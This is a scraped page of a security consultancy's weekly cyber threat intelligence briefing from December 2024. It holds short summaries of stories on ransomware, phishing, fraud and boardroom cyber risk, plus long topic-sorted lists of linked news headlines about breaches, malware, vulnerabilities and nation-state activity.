Huge cyber crime attack sees 390,000 WordPress websites hit, details stolen | TechRadar

Hacker Leaks Cisco Data - SecurityWeek

Cyber Security Incident at Deloitte May Be Responsible for RIBridges Data Breach | Console and Associates, P.C. - JDSupra

Consumers wrongly attribute all data breaches to cyber criminals - Help Net Security

Millions stolen from LastPass users in massive attack — what you need to know | Tom's Guide

390,000+ WordPress Credentials Stolen via Malicious GitHub Repository Hosting PoC Exploits

LastPass threat actor steals $5.4M from victims just a week before Xmas

Deloitte handling 'major' cyber attack on Rhode Island system • The Register

Nearly 400,000 WordPress credentials stolen | Security Magazine

LastPass breach comes back to haunt users as hackers steal $12 million in two days – DataBreaches.Net

LastPass Hackers Allegedly Stole $5 Million This Week—Report

How common are consumer data breaches? | Chain Store Age

Texas Tech University System data breach impacts 1.4 million patients

Meta Fined $264M for Security Breach in Facebook's 'View As' Feature - CNET

Rhode Island Residents’ Data Breached in Large Cyber Attack; Data May Be Leaked Soon – DataBreaches.Net

International Development Firm Chemonics Sued Over Breach (1)

900,000 People Impacted by ConnectOnCall Data Breach - SecurityWeek

Regional Care Data Breach Impacts 225,000 People - SecurityWeek

Organised Crime & Criminal Actors

Consumers wrongly attribute all data breaches to cyber criminals - Help Net Security

UK’s internet watchdog unveils online criminal crackdown

Ofcom Issues Guidance for Tech Firms to Tackle Online Harms - Infosecurity Magazine

Major cyber crime crackdowns signal a shift in global cyber security strategies - Policing Insight

Texan man gets 30 years in prison for running CSAM exchange • The Register

Bobbies on the beat won't stop the cyber crime wave | The Spectator

Why Are Crypto Scammers (And Not Hackers) Looking For You? | HackerNoon

Hacker sentenced to 69 months for stealing payment card info | SC Media

Cryptocurrency hackers stole $2.2 billion from platforms in 2024 - Help Net Security

Raccoon Stealer malware operator gets 5 years in prison after guilty plea

Cyber Criminals and the SEC: What Companies Need to Know

Trump to Wage War on Cyber Criminals, Says Advisor

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

LastPass threat actor steals $5.4M from victims just a week before Xmas

Hackers Exploit Webview2 to Deploy CoinLurker Malware and Evade Security Detection

LastPass breach comes back to haunt users as hackers steal $12 million in two days – DataBreaches.Net

Why Are Crypto Scammers (And Not Hackers) Looking For You? | HackerNoon

Cryptocurrency hackers stole $2.2 billion from platforms in 2024 - Help Net Security

North Korean Hackers Stole $1.3 Billion in Crypto in 2024

New fake Ledger data breach emails try to steal crypto wallets

Crypto Hacks in 2024: Centralized Exchanges Are Now the Top Targets for Cyber Criminals

Interpol: Stop calling it 'pig butchering' • The Register

Crypto holder loses assets priced at $2.5 million

Malicious Microsoft VSCode extensions target devs, crypto community

Insider Risk and Insider Threats

Kroll Settles With Ex-Employees Over Cyber Security Trade Secrets

GCHQ worker accused of taking top secret data home - BBC News

Protecting IP in a Cyber-Threatened World: Insights from Zifino and Foley & Lardner | Foley & Lardner LLP - JDSupra

Insurance

Lloyd's of London Launches New Cyber Insurance Consortium

What will happen in the cyber insurance space during 2025? | Insurance Business America

Supply Chain and Third Parties

Supply Chain Risk Mitigation Must Be a Priority in 2025

Cyber Security Incident at Deloitte May Be Responsible for RIBridges Data Breach | Console and Associates, P.C. - JDSupra

Deloitte handling 'major' cyber attack on Rhode Island system • The Register

Harnessing Threat Intel and Automation to Counter Supply Chain Risks | MSSP Alert

Property deals hit by IT security failure at search service

CERT-UA: Russia-linked UAC-0125 abuses Cloudflare Workers to target Ukrainian army

Cloud/SaaS

Clop is back to wreak havoc via vulnerable file-transfer software | CyberScoop

Crooks use Docusign lures to attempt Azure account takeovers • The Register

SaaS: The Next Big Attack Vector | Grip Security - Security Boulevard

DarkGate malware spread via Microsoft Teams, AnyDesk | SC Media

CISA issues new directive to bolster cloud security – and Microsoft was singled out | ITPro

Ransomware attacks exploit Cleo bug as Cl0p claims it • The Register

US Government Issues Cloud Security Requirements for Federal Agencies - Infosecurity Magazine

Cloud Threat Landscape Report: AI-generated attacks low for the cloud

HubSpot phishing targets 20,000 Microsoft Azure accounts

European firms subjected to HubSpot-exploiting phishing | SC Media

Microsoft 365 users hit by random product deactivation errors

Identity and Access Management

Why Role-Based Access Control is Critical to Your Security Stack | MSSP Alert

Proactive Approaches to Identity and Access Management - Security Boulevard

Security Leaders Say Machine Identities – Such as Access Tokens and Service Accounts – Are Next Big Target for Cyber Attack | Business Wire

Machine identity attacks will be top of mind for security leaders in 2025 | ITPro

Encryption

The Simple Math Behind Public Key Cryptography | WIRED

Why 2025 Will Be Pivotal in Our Defence Against Quantum Threat

Passwords, Credential Stuffing & Brute Force Attacks

"Password Era is Ending" Microsoft to Delete 1 Billion Password to Replace "Passkey"

Millions stolen from LastPass users in massive attack — what you need to know | Tom's Guide

Credential phishing attacks rose by 703% in H2 of 2024 | Security Magazine

LastPass threat actor steals $5.4M from victims just a week before Xmas

390,000+ WordPress Credentials Stolen via Malicious GitHub Repository Hosting PoC Exploits

LastPass 2022 hack fallout continues with millions of dollars more reportedly stolen | TechRadar

Nearly 400,000 WordPress credentials stolen | Security Magazine

HubPhish Exploits HubSpot Tools to Target 20,000 European Users for Credential Theft

What is a Compromised Credentials Attack? - Security Boulevard

MUT-1244 targeting security researchers, red teamers, and threat actors - Help Net Security

Cyberint's 2024 Report Highlights Surge in Credential Theft and Rise of AI-Powered Phishing - IT Security Guru

Social Media

New Investment Scam Leverages AI, Social Media Ads to Target Victims Worldwide

Study reveals vulnerability of metaverse platforms to cyber attacks

YouTube Creators Targeted in Major Phishing Campaign - Infosecurity Magazine

European Commission Opens TikTok Election Integrity Probe - Infosecurity Magazine

Meta fined for 2018 breach that exposed 30M accounts • The Register

Malvertising

New Investment Scam Leverages AI, Social Media Ads to Target Victims Worldwide

Fake Captcha Campaign Highlights Risks of Malvertising Networks - Infosecurity Magazine

Malvertising on steroids serves Lumma infostealer - Help Net Security

Malvertisers Fool Google With AI-Generated Decoys

Regulations, Fines and Legislation

UK’s internet watchdog unveils online criminal crackdown

Ofcom Issues Guidance for Tech Firms to Tackle Online Harms - Infosecurity Magazine

Why We Should Insist on Future-Proofing Cyber Security Regulatory Frameworks - Security Boulevard

Why the UK's "outdated" cyber security legislation needs an urgent refresh | ITPro

Hundreds of websites to shut down under UK's 'chilling' internet laws

The Top Cyber Security Agency in the US Is Bracing for Donald Trump | WIRED

EU Sanctions Russian Cyber Actors for “Destabilizing Actions” - Infosecurity Magazine

With DORA approaching, financial institutions must strengthen their cyber resilience - Help Net Security

Understanding NIS2: Essential and Important Entities - Security Boulevard

Study finds ‘significant uptick’ in cyber security disclosures to SEC | CyberScoop

The Year of Global AI and Cyber Security Regulations: 7 GRC Predictions for 2025 - Security Boulevard

Meta Fined $264M for Security Breach in Facebook's 'View As' Feature - CNET

Meta fined for 2018 breach that exposed 30M accounts • The Register

Trump Looks to Go 'On the Offense' Against Cyber Attackers

Models, Frameworks and Standards

How the cyber security landscape affects the financial sector

An easy to follow NIST Compliance Checklist - Security Boulevard

With DORA approaching, financial institutions must strengthen their cyber resilience - Help Net Security

Understanding NIS2: Essential and Important Entities - Security Boulevard

Using CIS Benchmarks to Assess Your System Security Posture | MSSP Alert

NIS2 Penetration Testing and Compliance - Security Boulevard

Backup and Recovery

Ransomware defences are being weakened by outdated backup technology, limited backup data encryption, and failed data backups | TechRadar

Careers, Working in Cyber and Information Security

Closing the SMB cyber security skills gap: Key steps | SC Media

Leadership in Cyber Security: A Guide to Your First Role

The key to growing a cyber security career are soft skills - Security Boulevard

Law Enforcement Action and Take Downs

Major cyber crime crackdowns signal a shift in global cyber security strategies - Policing Insight

Arizona man arrested for alleged involvement in violent online terror networks | CyberScoop

Texan man gets 30 years in prison for running CSAM exchange • The Register

Man Accused of SQL Injection Hacking Gets 69-Month Prison Sentence - SecurityWeek

Hacker sentenced to 69 months for stealing payment card info | SC Media

Raccoon Stealer malware operator gets 5 years in prison after guilty plea

Dodgy Firestick crackdown: full list of UK areas targeted by police

Germany blocks BadBox malware loaded on 30,000 Android devices

Romanian Netwalker ransomware affiliate sentenced to 20 years in prison

Misinformation, Disinformation and Propaganda

Romania’s election was target of cyber attacks and misinformation, parliament finds

European Commission Opens TikTok Election Integrity Probe - Infosecurity Magazine

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Nation State Actors

China

Chinese wi-fi tech used in British homes investigated over hacking fears

Feds Investigate, Mull Ban on Chinese-Made Routers | Newsmax.com

TP-Link routers could be banned in the US over national security concerns | TechSpot

European Commission Opens TikTok Election Integrity Probe - Infosecurity Magazine

PHP backdoor looks to be work of Chinese-linked APT group | CyberScoop

Trump security advisor urges offensive cyber attacks on China • The Register

Russia

Russia Recruits Ukrainian Children for Sabotage and Reconnaissance - Infosecurity Magazine

Ukrainian Minors Recruited for Cyber Ops and Reconnaissance in Russian Airstrikes

Midnight Blizzard Taps Phishing Emails, Rogue RDP Nets

EU Sanctions Russian Cyber Actors for “Destabilizing Actions” - Infosecurity Magazine

Romania’s election was target of cyber attacks and misinformation, parliament finds

Russian hackers use RDP proxies to steal data in MiTM attacks

APT29 group used red team tools in rogue RDP attacks

CERT-UA: Russia-linked UAC-0125 abuses Cloudflare Workers to target Ukrainian army

Ukraine's Defence Minister agrees with US to deepen cooperation in cyber security | Ukrainska Pravda

Largest cyber attack on Ukraine's state registers: Ministry of Justice systems shut down | Ukrainska Pravda

Russian FSB relies on Ukrainian minors for criminal activities disguised as "quest games"

Recorded Future CEO applauds "undesirable" designation by Russia

US Organisations Still Using Kaspersky Products Despite Ban - Infosecurity Magazine

Russia spent €69mn on propaganda and interference in Bulgaria and Romania, Bulgarian cyber security group reveals

Iran

Iran crew used 'cyberweapon' against US critical infra • The Register

North Korea

North Korean Hackers Stole $1.3 Billion in Crypto in 2024

Lazarus targets nuclear-related organisation with new malware | Securelist

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

The Mask APT Resurfaces with Sophisticated Multi-Platform Malware Arsenal

Bitter APT Targets Turkish Defence Sector with WmRAT and MiyaRAT Malware

Serbian police used Cellebrite to unlock, then plant spyware, on a journalist's phone | TechCrunch

Authorities abroad use phone-cracking tools to install spyware, report says - The Washington Post

New Android NoviSpy spyware linked to Qualcomm zero-day bugs

Tools and Controls

Ransomware defences are being weakened by outdated backup technology, limited backup data encryption, and failed data backups | TechRadar

From digital risk to physical threat: Why cyber security must evolve for executives | SC Media

Why Role-Based Access Control is Critical to Your Security Stack | MSSP Alert

Addressing BYOD Vulnerabilities in the Workplace - Security Boulevard

DarkGate malware spread via Microsoft Teams, AnyDesk | SC Media

Hackers Exploit Microsoft Teams to Gain Remote Access to User’s System

Hackers Scanning RDP Services Especially Port 1098 For Exploitation

To Defeat Cyber Criminals, Understand How They Think

Are threat feeds masking your biggest security blind spot? - Help Net Security

The evolution of incident response: building a successful strategy | TechRadar

New APIs Discovered by Attackers in Just 29 Seconds - Infosecurity Magazine

Harnessing Threat Intel and Automation to Counter Supply Chain Risks | MSSP Alert

Penetration testing – a critical component of financial cyber security in 2025

Machine identity attacks will be top of mind for security leaders in 2025 | ITPro

The pros and cons of biometric authentication | TechTarget

Wallarm Releases API Honeypot Report Highlighting API Attack Trends

Might need a mass password reset one day? Read this first.

The evolution of incident response: building a successful strategy | TechRadar

Making smart cyber security spending decisions in 2025

Why You Must Replace Your Legacy SIEM and Migrate to Modern SIEM Analytics? - IT Security Guru

Russian hackers use RDP proxies to steal data in MiTM attacks

APT29 group used red team tools in rogue RDP attacks

What will happen in the cyber insurance space during 2025? | Insurance Business America

Is Your Cloud Infrastructure Truly Protected? - Security Boulevard

The Feds Have Some Advice for 'Highly Targeted' Individuals: Don't Use a VPN

Gaining Confidence Through Effective Secrets Vaulting - Security Boulevard

NCSC Mail Check Changes & Their Impact on UK Public Sector Email Security - Security Boulevard

Other News

Hackers Scanning RDP Services Especially Port 1098 For Exploitation

Travel Cyber Security Threats and How to Stay Protected - Security Boulevard

Schools Need Improved Cyber Education (Urgently) - IT Security Guru

Study reveals vulnerability of metaverse platforms to cyber attacks

WiFi hacking for the everyday spy | Cybernews

Leadership skills for managing cyber security during digital transformation - Help Net Security

UK businesses risk disruption as PSTN switch-off approaches | Computer Weekly

MSSP Market Update: Fortune 500 Firms Fail at Cyber Security | MSSP Alert

2025 is set to bring changes in technology adoption and the evolving attack surface

Cyber Security In 2025 – A New Era Of Complexity

The Feds Have Some Advice for 'Highly Targeted' Individuals: Don't Use a VPN

Resolve to Be Resilient: Top Cyber Priorities for State and Local Government

Cyber Security Threats to Our Most Basic Needs

Cyber Security in the legal sector: awareness & proactive strategies - Legal News

Global cyber security impact on food and drink firms

Inform: The cyber complexities facing local government | UKAuthority

Santa-hacking - how to carry out a cyber attack on Father Christmas - Prolific North

Watch Out for These Holiday Cyber Attacks

How to tell if a USB cable is hiding malicious hacker hardware | PCWorld

Inform: The cyber complexities facing local government | UKAuthority

The Education Industry: Why Its Data Must Be Protected

How fan engagement impacts cyber security in sports - Verdict

Why cyber security is critical to energy modernization - Help Net Security

Vulnerability Management

Are threat feeds masking your biggest security blind spot? - Help Net Security

Drowning in Visibility? Why Cyber Security Needs to Shift from Visibility to Actionable Insight - Security Boulevard

No, Microsoft has not 'reversed course' on Windows 11 hardware requirements | ZDNET

Vulnerabilities

2024 Sees Sharp Increase in Microsoft Tool Exploits - Infosecurity Magazine

Patch Alert: Critical Apache Struts Flaw Found, Exploitation Attempts Detected

Critical OpenWrt Vulnerability Exposes Devices to Malicious Firmware Injection

Microsoft Patches Vulnerabilities in Windows Defender, Update Catalog - SecurityWeek

Citrix shares mitigations for ongoing Netscaler password spray attacks

Cleo MFT Zero-Day Exploits Are About to Escalate

Over 25,000 SonicWall VPN Firewalls exposed to critical flaws

Windows kernel bug now exploited in attacks to gain SYSTEM privileges

Clop ransomware group claims responsibility for exploiting Cleo file transfer vulnerabilities

Over 300 orgs compromised through several DrayTek exploits | SC Media

Fortinet warns about Critical flaw in Wireless LAN Manager FortiWLM

Chrome 131 Update Patches High-Severity Memory Safety Bugs - SecurityWeek

Hackers Exploiting Critical Fortinet EMS Vulnerability to Deploy Remote Access Tools

Hackers are abusing Microsoft tools more than ever before | TechRadar

BeyondTrust Patches Critical Vulnerability Discovered During Security Incident Probe - SecurityWeek

Microsoft confirms critical Windows Defender vulnerability. What you need to do right now. | Mashable

New Apache Tomcat Vulnerabilities Let Attackers Execute Remote Code

Undocumented DrayTek Vulnerabilities Exploited to Hack Hundreds of Orgs - SecurityWeek

Critical flaw in WordPress plugin exploited to install malicious software | SC Media

Researchers claim an AMD security flaw could let hackers access encrypted data | ITPro

Sector Specific

Industry-specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

- Automotive

- Construction

- Critical National Infrastructure (CNI)

- Defence & Space

- Education & Academia

- Energy & Utilities

- Estate Agencies

- Financial Services

- FinTech

- Food & Agriculture

- Gaming & Gambling

- Government & Public Sector (including Law Enforcement)

- Health/Medical/Pharma

- Hotels & Hospitality

- Insurance

- Legal

- Manufacturing

- Maritime & Shipping

- Oil, Gas & Mining

- OT, ICS, IIoT, SCADA & Cyber-Physical Systems

- Retail & eCommerce

- Small and Medium Sized Businesses (SMBs)

- Startups

- Telecoms

- Third Sector & Charities

- Transport & Aviation

- Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness; linking to or reposting external content does not endorse any service or product, and we are not responsible for the security of external links.

Black Arrow Admin

Black Arrow Cyber Threat Intelligence Briefing 13 December 2024

Black Arrow Cyber Threat Intelligence Briefing 13 December 2024:

-Cyber Security Risks Rise During Mergers & Acquisitions

-Ransomware Gangs’ Merciless Attacks Bleed Small Companies Dry

-AI & Cyber Security to Shape the Tech Landscape in 2025

-Phishing: The Silent Precursor to Data Breaches

-Business Cyber Understanding Gap Creates New Vulnerabilities

-Cyber Defence vs Cyber Resilience: Why It's Time to Prioritise Recovery

-UK SMEs Are Concerned About Preparedness for Cyber Attacks as Fraud Rises

-Cyber Risk to Intensify in 2025 as Attackers Switch Tactics

-Companies Pull Company and Board Leadership Bios from Their Websites After Insurance Executive’s Killing

-Boardroom Risks Revealed in Latest Beazley Report

-Employee Visits to Adult or Gambling Sites Doubles Risk of Infection by Malware

-North Korea's Fake IT Worker Scam Hauled in at Least $88 Million Over Six Years

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Top Cyber Stories of the Last Week 

Cyber Security Risks Rise During Mergers & Acquisitions

ReliaQuest’s analysis reveals heightened cyber security risks during mergers and acquisitions, with half of incidents stemming from threat actors exploiting potential security gaps, and the remainder from non-malicious employee issues. The manufacturing, finance and retail sectors were the hardest hit. One private equity CISO observed a 400% surge in phishing attempts post-M&A announcements. Key risks include phishing attacks, data leaks, and vulnerabilities due to legacy systems. ReliaQuest recommends proactive strategies like pre-due-diligence assessments, training, network segmentation, and unified logging to mitigate these risks and ensure smoother integration during M&As.

Ransomware Gangs’ Merciless Attacks Bleed Small Companies Dry

Ransomware attacks surged by 70% in 2023, hitting 4,611 reported incidents according to industry research, with one gang alone extorting an estimated $42 million. Around 80% of victims are small and medium-sized organisations. Many rely on cyber security insurance with limits around £1 million, yet the median ransom soared to $6.5 million this year. This gap between insurance coverage and actual costs has driven some companies into administration. Experts warn that, although attackers often use unsophisticated techniques, they remain ruthless. Robust monitoring software, password protection and comprehensive incident response plans can provide critical defences against this escalating threat.

AI & Cyber Security to Shape the Tech Landscape in 2025

The tech landscape of 2025 will be defined by the growth of specialised AI solutions and evolving cyber security measures, according to sector leaders from Nutanix, Rubrik, Snowflake, Obsidian Security, ManageEngine, and Infoblox. Cloud-based AI agents will automate threat detection, but also heighten risks of data leaks and identity-based attacks. Industry-specific models will transform finance, healthcare, manufacturing, and hospitality, offering faster, more precise services. Organisations must enhance data access controls, involve all staff in cyber security, and align IT and business goals. Government regulations and platform-based strategies will play a critical role in supporting innovation and safeguarding operations.

Phishing: The Silent Precursor to Data Breaches

Phishing remains a silent precursor to destructive data breaches, accounting for 31% of cyber security incidents - outdone only by weak or compromised credentials and pretexting. By exploiting human psychology, phishing bypasses technological safeguards, enabling the theft of sensitive data and triggering large-scale cyber attacks. One major infrastructure breach was initiated through a phishing-driven compromise, underscoring the threat’s far-reaching impact. Organisations can reduce phishing risks by prioritising employee training, filtering malicious emails, and implementing multi-factor authentication. This multi-layered approach, combined with a strong incident response plan, is essential to help safeguard systems and protect sensitive information in the modern cyber threat landscape.

Business Cyber Understanding Gap Creates New Vulnerabilities

Cyber security insurance provider Resilience has found that many UK mid-to-large businesses lack a clear grasp of cyber security as a financial risk, despite 74% having experienced cyber crime. The survey of IT and financial leaders highlighted a worrying gap between media focus on data breaches (cited by 72% as their main worry) and the larger financial impact of ransomware (responsible for more than 80% of losses). Limited use of quantitative risk registries (54%) further hampers businesses’ ability to mitigate cyber threats.

Cyber Defence vs Cyber Resilience: Why It's Time to Prioritise Recovery

AI-driven cyber attacks are prevalent, with intruders able to remain undetected for months and most ransomware campaigns targeting backup repositories. This demands a shift from solely cyber defence to holistic cyber resilience. A strategy includes a robust backup approach, active monitoring, and an isolated recovery environment to ensure data remains clean and recoverable. Equally important is cross-functional collaboration between IT and security teams to flag and respond to breaches quickly. By prioritising recovery and resilience, organisations can maintain business operations, minimise downtime, and stay ahead of evolving cyber threats in today’s borderless IT landscape.

UK SMEs Are Concerned About Preparedness for Cyber Attacks as Fraud Rises

Online payment provider Mollie has reported that five and a half million UK SMEs lost an average of £10,800 to fraud this year, leaving nine in 10 C-Suite executives concerned about their survival. Fraud types included phishing (58%), refund scams (42%), account takeovers (30%) and carding attacks (23%). Firms spent around 15 days annually handling these threats, diverting critical resources from core operations. This underscores a growing need for effective cyber security measures that combat rising threats without stifling business growth. Mollie’s research highlights the importance of equipping smaller enterprises with balanced solutions to safeguard revenue and productivity, protecting them from ever-evolving forms of cyber attack.

Cyber Risk to Intensify in 2025 as Attackers Switch Tactics - Moody’s

According to Moody’s 2025 cyber security outlook, the threat environment is evolving as attackers target bigger businesses and harness AI for more potent attacks. Ransomware soared by 70% from 2022 to 2023, with ransom payments hitting a record $1.1 billion. Meanwhile, the share of victims paying ransoms is falling, driving cyber criminals to focus on larger organisations. Supply chain incidents are growing in parallel with the proliferation of AI-enabled scams and greater reliance on external providers. Moody’s advises that robust risk assessments and improved cyber security measures, including passkeys, can help address these mounting challenges.

Companies Pull Leadership Bios from Their Websites After Insurance Executive’s Killing

Following the tragic shooting of a leading insurance executive in New York City, major health insurers have swiftly removed leadership bios from their websites. Archived versions of UnitedHealthcare, Anthem Blue Cross Blue Shield, and Elevance Health pages show these details were public until shortly after the incident. Faced with heightened security concerns, organisations are reinforcing protective measures, while private security firms report a surge in new business. This underscores an evolving risk landscape for senior leaders, prompting companies to carefully manage executive information online and reassess personal safety protocols.

Boardroom Risks Revealed in Latest Beazley Report

Beazley’s latest report highlights cyber security as the top boardroom concern, cited by 45% of executives. Regulatory compliance (41%) and ESG (35%) follow closely, yet 60% of respondents feel only moderately or poorly prepared for cyber attacks. ESG influences are expected to surge, with 68% foreseeing major board impact, but just 39% feel ready. The report urges proactive risk management, encouraging boards to strengthen internal expertise, invest in technology, and align governance strategies with shifting priorities.

Employee Visits to Adult or Gambling Sites Doubles Risk of Infection by Malware

According to new research, employees visiting gambling or adult sites can double the risk of malware infections, including coinminers, trojans, and hacking tools. Browsing illegal sites may increase malware threats by up to five times, while frequent visits to unknown websites also raise infection odds. By identifying how specific user behaviours relate to distinct malware types, organisations can tailor their cyber security defences accordingly. Governments might prioritise hacktools, whereas healthcare could focus on ransomware. Overall, the study suggests that targeted, behaviour-based cyber security measures can help organisations reduce risks cost-effectively for their unique threat profiles.

North Korea's Fake IT Worker Scam Hauled in at Least $88 Million Over Six Years

North Korea’s covert IT workforce has reportedly generated $88 million over six years by posing as remote tech professionals, according to the US Department of Justice. Hiding their true identities and locations, these “IT warriors” channel their earnings into Pyongyang’s coffers, while some leverage access privileges to steal proprietary data and extort employers. Even cyber security businesses have been duped. Authorities have uncovered over 130 participants, linked to firms in China and Russia. Officials warn the threat persists, with continued guidance on detecting the scam and a multimillion-dollar reward in place to disrupt North Korea’s illicit revenue streams.

Sources:

https://securitybrief.co.nz/story/cybersecurity-risks-rise-during-mergers-acquisitions

https://www.claimsjournal.com/news/national/2024/12/06/327772.htm

https://securitybrief.co.nz/story/ai-cybersecurity-to-shape-the-tech-landscape-in-2025

https://www.securityweek.com/phishing-the-silent-precursor-to-data-breaches/

https://www.emergingrisks.co.uk/business-cyber-understanding-gap-creates-new-vulnerabilities/

https://betanews.com/2024/12/06/cyber-defense-vs-cyber-resilience-why-its-time-to-prioritize-recovery/

https://thefintechtimes.com/uk-smes-are-concerned-about-preparedness-for-cyberattacks-as-fraud-rises-finds-mollie/

https://www.reinsurancene.ws/cyber-risk-to-intensify-in-2025-as-attackers-switch-tactics-moodys/

https://fortune.com/2024/12/06/unitedhealthcare-major-insurance-companies-pull-company-board-leadership-bios-elevance-anthem-blue-shield-cross/

https://www.insurancebusinessmag.com/us/news/breaking-news/boardroom-risks-revealed-in-latest-beazley-report-516949.aspx

https://www.newswise.com/articles/employee-visits-to-adult-or-gambling-sites-doubles-risk-of-infection-by-malware

https://www.theregister.com/2024/12/13/doj_dpkr_fake_tech_worker_indictment/

Governance, Risk and Compliance

UK SMEs Are Concerned About Preparedness For Cyber Attacks as Fraud Rises Finds Mollie | The Fintech Times

Cyber security risks rise during mergers & acquisitions

Boardroom risks revealed in latest Beazley report | Insurance Business America

UnitedHealthcare and other major insurance companies pull company and board leadership bios from their websites after executive’s killing | Fortune

Dear CEO: It’s time to rethink security leadership and empower your CISO | CSO Online

Moody's: Hackers Aim for Big Payouts, Supply Chain Attacks

We must adjust expectations for the CISO role - Help Net Security

Cyber defence vs cyber resilience: why it's time to prioritize recovery

Business cyber understanding gap creates new vulnerabilities

Cyber risk to intensify in 2025 as attackers switch tactics: Moody's - Reinsurance News

Cyber Security In The Digital Frontier: Reimagining Organisational Resilience

Charges Against CISOs Create Worries, Hope in Security Industry: Survey - Security Boulevard

The skills that cyber security leaders need

70 percent of cyber security leaders worry about personal liability

Report: 84% of Fortune 500 companies scored a D or worse for their cyber security efforts | Cybernews

CISOs need to consider the personal risks associated with their role - Help Net Security

Cyber security has become a strategic differentiator for organisations, says Ismail Al Naqi at GN forum | Technology – Gulf News

Cultivating a Hacker Mindset in Cyber Security Defence

Blackbaud Appoints Bradley Pyburn, Former Chief of Staff of US Cyber Command, to Board of Directors

Heed the warnings on cyber security threats - James McGachie

How to Improve Your Cyber Security On a Lower Budget | Mimecast

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware Gangs’ Merciless Attacks Bleed Small Companies Dry

You’ve been hit with ransomware. Think twice before you pay. | Constangy, Brooks, Smith & Prophete, LLP - JDSupra

Black Basta Ransomware Evolves with Email Bombing, QR Codes, and Social Engineering

Cleo Vulnerability Exploitation Linked to Termite Ransomware Group - SecurityWeek

New Windows Drive-By Security Attack—What You Need To Know

What Do We Know About the New Ransomware Gang Termite?

Ransomware Victims

Blue Yonder SaaS giant breached by Termite ransomware gang

8Base hacked port operating company Luka Rijeka - Help Net Security

Separate ransomware attacks hit Japanese firms’ US subsidiaries | SC Media

Deloitte Responds After Ransomware Group Claims Data Theft - SecurityWeek

Anna Jaques Hospital ransomware breach exposed data of 300K patients

National Museum of the Royal Navy hit by cyber attack - Museums Association

Ransomware Disrupts Operations At Leading Heart Surgery Device Maker

Krispy Kreme admits there's a hole in its security • The Register

Phishing & Email Based Attacks

Businesses plagued by constant stream of malicious emails - Help Net Security

Phishing: The Silent Precursor to Data Breaches - SecurityWeek

A new report shows QR code phishing is on the rise | Security Magazine

Black Basta Ransomware Evolves with Email Bombing, QR Codes, and Social Engineering

Cyber criminals are using virtual hard drives to drop RATs in phishing attacks | TechRadar

European Police Disrupt Phone Phishing Gang with Arrests - Infosecurity Magazine

Eight Suspected Phishers Arrested in Belgium, Netherlands - SecurityWeek

Millionaire Airbnb Phishing Ring Busted Up by Police

Brand Impersonations Surge 2000% During Black Friday

Scam Kit Maker Rebuilding Business After Telegram Channel Shut Down - Security Boulevard

New Advanced Email Attack Warning Issued—5 Things To Know

Email security: Why traditional defences fall short in today's threat landscape

Fake Recruiters Distribute Banking Trojan via Malicious Apps in Phishing Scam

Businesses received over 20 billion spam emails this year | TechRadar

Phishing Scam Targets Ukrainian Defence Companies - Infosecurity Magazine

5 Email Attacks You Need to Know for 2025 | Abnormal

Business Email Compromise (BEC)/Email Account Compromise (EAC)

Understanding the Shifting Anatomy of BEC Attacks

Notorious Nigerian cyber criminal tied to BEC scams extradited to US | CyberScoop

Other Social Engineering

Black Basta Ransomware Evolves with Email Bombing, QR Codes, and Social Engineering

KnowBe4 Report Finds 44% of HR Professionals Have Encountered Fraudulent or Scam Job Applications - IT Security Guru

Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion | Trend Micro (US)

Cyber criminals Impersonate Dubai Police to Defraud Consumers in the UAE - Smishing Triad in Action

Hackers are posing as job recruiters to spread a dangerous banking trojan and steal your money — don’t fall for this | Tom's Guide

Spain busts voice phishing ring for defrauding 10,000 bank customers

Fake IT Workers Funnelled Millions to North Korea, DOJ Says - SecurityWeek

Artificial Intelligence

Generative AI's cyber security potential is clear, but so far it's given hackers the upper hand | ITPro

AI & cyber security to shape the tech landscape in 2025

Microsoft Recall caught capturing credit card and Social Security numbers despite reassurances it won't | Tom's Guide

AI is a gamble we cannot afford without cyber security

Compromised AI Library Delivers Cryptocurrency Miner via PyPI - Infosecurity Magazine

AI fakes, cyber attacks threaten German election – DW – 12/06/2024

Researchers Uncover Prompt Injection Vulnerabilities in DeepSeek and Claude AI

A Very Merry NISTmas: 2024 Updates to the Cyber Security and AI Framework | Ropes & Gray LLP - JDSupra

2FA/MFA

Microsoft Azure MFA Flaw Allowed Easy Access Bypass - Infosecurity Magazine

Microsoft MFA Bypassed via AuthQuake Attack - SecurityWeek

No User Interaction, No Alerts: Azure MFA Cracked In An Hour

Researchers Crack Microsoft Azure MFA in an Hour

Snowflake Rolls Out Mandatory MFA Plan

Malware

Employee Visits to Adult or Gambling Sites Doubles | Newswise

Windows, macOS users targeted with crypto-and-info-stealing malware - Help Net Security

Cyber criminals are using virtual hard drives to drop RATs in phishing attacks | TechRadar

Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion | Trend Micro (US)

Cleo Patches Exploited Flaw as Security Firms Detail Malware Pushed in Attacks - SecurityWeek

Open source malware surged by 156% in 2024 | ITPro

Fake Recruiters Distribute Banking Trojan via Malicious Apps in Phishing Scam

Remcos RAT Malware Evolves with New Techniques - Infosecurity Magazine

More advanced Zloader malware variant emerges | SC Media

Hackers are posing as job recruiters to spread a dangerous banking trojan and steal your money — don’t fall for this | Tom's Guide

This devious new malware technique looks to hijack Windows itself to avoid detection | TechRadar

New stealthy Pumakit Linux rootkit malware spotted in the wild

RedLine info-stealer campaign targets Russian businesses

North Korean hackers target South Korea with Internet Explorer vulnerabilities to deploy RokRAT malware | TechRadar

Ongoing Phishing and Malware Campaigns in December 2024

Bots/Botnets

It’s Beginning To Look A Lot Like Grinch Bots

Mobile

Lookout Discovers New Spyware Deployed by Russia and China - Infosecurity Magazine

Gamaredon Deploys Android Spyware "BoneSpy" and "PlainGnome" in Former Soviet States

'EagleMsgSpy' Android Spyware Linked to Chinese Police

